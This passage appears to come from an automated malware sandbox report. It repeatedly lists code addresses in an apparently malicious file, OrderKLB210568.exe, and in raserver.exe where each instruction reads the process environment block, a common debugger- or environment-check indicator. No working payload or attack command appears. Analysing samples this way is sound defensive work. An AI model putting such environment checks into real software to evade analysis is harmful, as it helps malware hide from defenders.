          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AED294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B44257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B85BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B805AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B68DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B36DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B3A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B33540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B63D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AD7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B80EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B6FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ABC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AE8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B71608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B7AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B37794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AC8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AF37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AB4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00AEA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B4FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B8070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ADF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00B88F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\OrderKLB210568.exeCode function: 1_2_00ACEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0517A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05103D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05124D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05117D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05133D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05173540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0511C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_050F2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_0512FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05122581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_05121DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051C05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 9_2_051235A1 mov eax, dword ptr fs:[00000030h]
